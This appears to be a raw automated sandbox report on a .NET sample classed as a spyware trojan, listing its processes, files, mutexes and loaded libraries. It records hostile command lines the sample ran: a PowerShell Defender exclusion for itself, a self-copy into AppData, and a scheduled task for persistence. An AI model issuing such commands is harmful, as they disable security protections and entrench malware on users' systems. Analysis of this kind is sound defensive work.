Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, SwCftK6S58okDsOPI5.cs Security API names: _0020.AddAccessRule
Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, onTDHLANSwQB4GuLwN.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 3140, EUR.exe, 00000000.00000002.1725784467.0000000000BD6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OobeEnableRtpAndSigUpdates;.VBP
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@23/15@4/4
Source: C:\Users\user\Desktop\3140, EUR.exe File created: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1456:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4812:120:WilError_03
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7480:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4324:120:WilError_03
Source: C:\Users\user\Desktop\3140, EUR.exe File created: C:\Users\user\AppData\Local\Temp\tmpE737.tmp
Source: 3140, EUR.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 3140, EUR.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\3140, EUR.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\3140, EUR.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 3140, EUR.exe ReversingLabs: Detection: 47%
Source: 3140, EUR.exe Virustotal: Detection: 43%
Source: C:\Users\user\Desktop\3140, EUR.exe File read: C:\Users\user\Desktop\3140, EUR.exe
Source: unknown Process created: C:\Users\user\Desktop\3140, EUR.exe "C:\Users\user\Desktop\3140, EUR.exe"
Source: C:\Users\user\Desktop\3140, EUR.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\3140, EUR.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\3140, EUR.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\3140, EUR.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lkuPOyvaWlIu" /XML "C:\Users\user\AppData\Local\Temp\tmpE737.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\3140, EUR.exe Process created: C:\Users\user\Desktop\3140, EUR.exe "C:\Users\user\Desktop\3140, EUR.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lkuPOyvaWlIu" /XML "C:\Users\user\AppData\Local\Temp\tmp4A2.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process created: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe "C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe"
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process created: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe "C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe"
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process created: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe "C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe"
Source: C:\Users\user\Desktop\3140, EUR.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\3140, EUR.exe"
Source: C:\Users\user\Desktop\3140, EUR.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe"
Source: C:\Users\user\Desktop\3140, EUR.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lkuPOyvaWlIu" /XML "C:\Users\user\AppData\Local\Temp\tmpE737.tmp"
Source: C:\Users\user\Desktop\3140, EUR.exe Process created: C:\Users\user\Desktop\3140, EUR.exe "C:\Users\user\Desktop\3140, EUR.exe"
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lkuPOyvaWlIu" /XML "C:\Users\user\AppData\Local\Temp\tmp4A2.tmp"
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process created: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe "C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe"
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process created: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe "C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe"
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Process created: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe "C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe"
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: msvcp140_clr0400.dll
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: msvcp140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Section loaded: dpapi.dll
